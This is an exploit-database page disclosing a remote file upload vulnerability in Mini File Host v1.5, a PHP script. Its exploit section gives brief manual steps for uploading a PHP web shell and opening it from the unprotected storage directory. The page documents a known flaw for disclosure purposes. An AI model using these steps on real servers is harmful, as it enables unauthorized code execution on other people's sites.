Mini File Host v1.5 Remote File Upload Vulnerability



EDB-ID: 10601 CVE: 2008-6785OSVDB-ID: 54242
Author: Mr.ZPublished: 2009-12-22Verified: Verified
Exploit Code:   DownloadVulnerable App:    Download

Rating

(0.0)
Prev Home Next
=====================================================================
=========
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
=====================================================================
=========
        [»] ~ Note : This vulnerability allows you to upload if the "storage" file isn't protected with a htaccess file or
anything else
=====================================================================
=========
        [»] Mini File Host v1.5 Remote File Upload Vulnerability
=====================================================================
=========
    [»] Script:             [ Mini File Host ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ Mini File Host v1.5 ]
    [»] Download:           [ http://www.hotscripts.com/listing/mini-file-host/ ]
    [»] Founder:            [ Mr.Z <tzar.evil@yahoo.com> ]
    [»] Greetz to:          [ all muslims , ViRuSMaN  ]
###########################################################################
===[ Exploit ]===
  Click on "Browse" and select your php shell
  Click Upload
  After it finishs , you will see this meassage (
  Your file was uploaded!
  Your download link
  http://server/script/download.php?file=328shell.php
  )
  Copy the new Name of the shell "328shell.php"
  Now Go to this Url
  http://server/script/storage/328shell.php
  if "Storage" wasn't protected your shell will open
Author: Mr.Z <-
###########################################################################






Comments

No comments so far